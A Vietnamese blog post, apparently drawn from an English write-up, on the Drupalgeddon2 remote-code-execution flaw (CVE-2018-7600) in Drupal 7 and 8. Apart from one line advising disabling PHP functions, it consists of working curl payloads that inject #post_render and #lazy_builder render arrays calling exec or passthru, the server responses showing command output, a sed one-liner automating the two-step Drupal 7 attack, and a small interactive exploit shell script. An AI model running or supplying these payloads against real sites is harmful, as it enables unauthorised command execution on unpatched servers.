Drupalgeddon - Thử injection Drupal 7 tại form tạo tài khoản và cái kết

Drupalgeddon - Thử injection Drupal 7 tại form tạo tài khoản và cái kết

CVE-2018-7600 | Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' RCE (SA-CORE-2018-002)

Các bạn nên disable_funtion trên php.ini trách các lỗi bảo mật như phía dưới

disable_funtion = exec, mail ...

PoC #1 - #post_render / account/mail / exec

It uses the user/register URL, #post_render parameter, targeting account/mail, using PHP's exec function.

curl -k -i 'http://localhost/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
    --data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=uname -a'

The server will give 200 response & display JSON. It IS able to render the output in the response (such as doing uname -a).

Example

[[email protected]]$ curl -k -i 'http://localhost/drupal-8.4.5/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
  --data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=uname -a'
HTTP/1.1 200 OK
Date: Wed, 18 Apr 2018 15:56:29 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Cache-Control: must-revalidate, no-cache, private
X-UA-Compatible: IE=edge
Content-language: en
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Expires: Sun, 19 Nov 1978 05:00:00 GMT
X-Generator: Drupal 8 (https://www.drupal.org)
X-Drupal-Ajax-Token: 1
Content-Length: 280
Content-Type: application/json

[{"command":"insert","method":"replaceWith","selector":null,"data":"Linux ubuntu140045x64-drupal 3.13.0-144-generic #193-Ubuntu SMP Thu Mar 15 17:03:53 UTC 2018 x86_64 x86_64 x86_64 GNU\/Linux\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
[[email protected]]$

PoC #2 - #lazy_builder / timezone/timezone / exec

It uses the user/register URL, #lazy_builder parameter, targeting timezone/timezone, using PHP's exec function.

curl -k -i 'http://localhost/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
    --data 'form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=touch+/tmp/2'

The server will give 500 response & display "The website encountered an unexpected error. Please try again later". It is NOT able to render the output in the response (Blind!).

Example

[[email protected]]$ curl -k -i 'http://localhost/drupal-8.4.5/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
    --data 'form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=touch+/tmp/2'
HTTP/1.0 500 500 Service unavailable (with message)
Date: Wed, 18 Apr 2018 15:58:04 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Cache-Control: no-cache, private
Content-Length: 74
Connection: close
Content-Type: text/html

The website encountered an unexpected error. Please try again later.<br />
[[email protected]]$
[email protected]:~# stat /tmp/2
  File: '/tmp/2'
  Size: 0         	Blocks: 0          IO Block: 4096   regular empty file
Device: fd01h/64769d	Inode: 59488       Links: 1
Access: (0644/-rw-r--r--)  Uid: (   33/www-data)   Gid: (   33/www-data)
Access: 2018-04-18 15:58:05.061898957 +0000
Modify: 2018-04-18 15:58:05.061898957 +0000
Change: 2018-04-18 15:58:05.061898957 +0000
 Birth: -
[email protected]:~#

Drupal v7.x

Tested on Drupal v7.55 / v7.57

This is a different when compared to v8.x, as you need to make two requests in order to exploit

PoC #3 - #post_render / user/password / passthru

It uses #post_render & name parameters, targeting user/password request, using PHP's passthru function.

We need to get the value from form_build_id:

curl -k -s 'http://localhost/drupal-7.55/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a' \
    --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id

NOTE: This time you need to URL encode (e.g. Spaces ~ -> +)_

Afterwards, make a new request, using the value from above as such:

curl -k -i "http://localhost/drupal-7.55/?q=file/ajax/name/%23value/${form_build_id}" \
    --data "form_build_id=${form_build_id}"

Example

[[email protected]]$ curl -k -s 'http://localhost/drupal-7.55/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a' \
    --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id
<input type="hidden" name="form_build_id" value="form-r55m87T9afnEo-eEePGipGpHTkjPFBgUCnytk_Zuc4I" />
[[email protected]]$
[[email protected]]$ form_build_id=form-r55m87T9afnEo-eEePGipGpHTkjPFBgUCnytk_Zuc4I
[[email protected]]$
[[email protected]]$ curl -k -i "http://localhost/drupal-7.55/?q=file/ajax/name/%23value/${form_build_id}" \
    --data "form_build_id=${form_build_id}"
HTTP/1.1 200 OK
Date: Wed, 18 Apr 2018 16:26:15 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
X-Drupal-Ajax-Token: 1
Set-Cookie: SESS8233de9b9c6a45efe3fd08080d4d6479=w51ZcYf67YNjEpVr0g5Smzzjx_vmSURbNdXHl4fKUj4; expires=Fri, 11-May-2018 19:59:35 GMT; Max-Age=2000000; path=/; HttpOnly
Content-Length: 537
Connection: close
Content-Type: application/json; charset=utf-8

Linux ubuntu140045x64-drupal 3.13.0-144-generic #193-Ubuntu SMP Thu Mar 15 17:03:53 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[{"command":"settings","settings":{"basePath":"\/drupal-7.55\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"_YUWCY69tMlrR-TCiD_jZ-NazJKUHeTo1Om8T4EJ_YQ"}},"merge":true},{"command":"insert","method":"replaceWith","selector":null,"data":"","settings":{"basePath":"\/drupal-7.55\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"_YUWCY69tMlrR-TCiD_jZ-NazJKUHeTo1Om8T4EJ_YQ"}}}]
[[email protected]]$

Bash Fu/Automation

We can automate this a little more by using sed to exact the value, as shown below:

form_build_id=$( curl -k -s 'http://localhost/drupal-7.55/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a' \
    --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | sed -E 's/.*name="form_build_id" value="(.*)".*/\1/' )

curl -k -i "http://localhost/drupal-7.55/?q=file/ajax/name/%23value/${form_build_id}" \
    --data "form_build_id=${form_build_id}"

Bash Scripting

We can make a very basic exploit (for Drupal v8) as show:

[[email protected]]$ cat exploit.sh
#!/bin/sh

# Forever loop
while True; do
  # Get input
  read -p 'drupalgeddon2>>: ' command

  # Make request
  curl -k 'http://localhost/drupal-8.4.5/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
    --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=${command}"

  # New line (the response doesn't have one)
  echo
done
[[email protected]]$
[[email protected]]$ sh exploit.sh
drupalgeddon2>>: id
[{"command":"insert","method":"replaceWith","selector":null,"data":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
drupalgeddon2>>: uname -a
[{"command":"insert","method":"replaceWith","selector":null,"data":"Linux ubuntu140045x64-drupal 3.13.0-144-generic #193-Ubuntu SMP Thu Mar 15 17:03:53 UTC 2018 x86_64 x86_64 x86_64 GNU\/Linux\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
drupalgeddon2>>: ^C
[[email protected]]$
Bạn thấy bài viết này như thế nào?: 
Average: 4.1 (7 votes)
Ảnh của Tommy Tran

Tommy Tran owner Express Magazine

Drupal Developer having 9+ year experience, implementation and having strong knowledge of technical specifications, workflow development. Ability to perform effectively and efficiently in team and individually. Always enthusiastic and interseted to study new technologies

  • Skype ID: tthanhthuy
  • Phone/Zalo: (+84) 944 225 212
  • WhatsApp: (+84) 944 225 212
  • Line Messenger: (+84) 944 225 212
  • Email: [email protected]
  • Telegram Messenger: https:/t.me/tommytran0401

Bình luận (1)

Ảnh của Tommy Tran
Tommy Tran- Mar 25, 2020 07:11 PM Reply

Quá đỉnh

 

Add Comment

Plain text

  • No HTML tags allowed.
  • Các địa chỉ web và email sẽ tự động được chuyển sang dạng liên kết.
  • Tự động ngắt dòng và đoạn văn.
CAPTCHA
This question is for testing whether or not you are a human visitor and to prevent automated spam submissions.
9 + 7 =
Solve this simple math problem and enter the result. E.g. for 1+3, enter 4.

Tìm kiếm bất động sản

 

Advertisement

 

jobsora

Dich vu khu trung tphcm

Dich vu diet chuot tphcm

Dich vu diet con trung

Quảng Cáo Bài Viết

 
Hội trợ triển lãm Palme 2013 chính thức khai mạc

Hội trợ triển lãm Palme 2013 chính thức khai mạc

Ngày 5/11, triển lãm Quốc tế lần thứ 3 tại Việt Nam về Thiết bị Nghe - Nhìn, Âm thanh - Ánh sáng chuyên nghiệp đã trở lại TPHCM sau 1 năm vắng bóng.

CMS Drupal, Drush

Hướng dẫn sử dụng Drush tool cho người mới bắt đầu

Drush is a great tool for quickly managing routine tasks with a Drupal installation.

[Phần 2] Hướng dẫn creating a custom field : Field widget trong Drupal 8

[Phần 2] Hướng dẫn creating a custom field : Field widget trong Drupal 8

This is part 2 in my series of articles about creating a custom field. I recommend reading Part 1: Field type first, if you have not done so already.

BLOG POSTS

 

Wordpress Freelancer

 

Wordpress Freelancer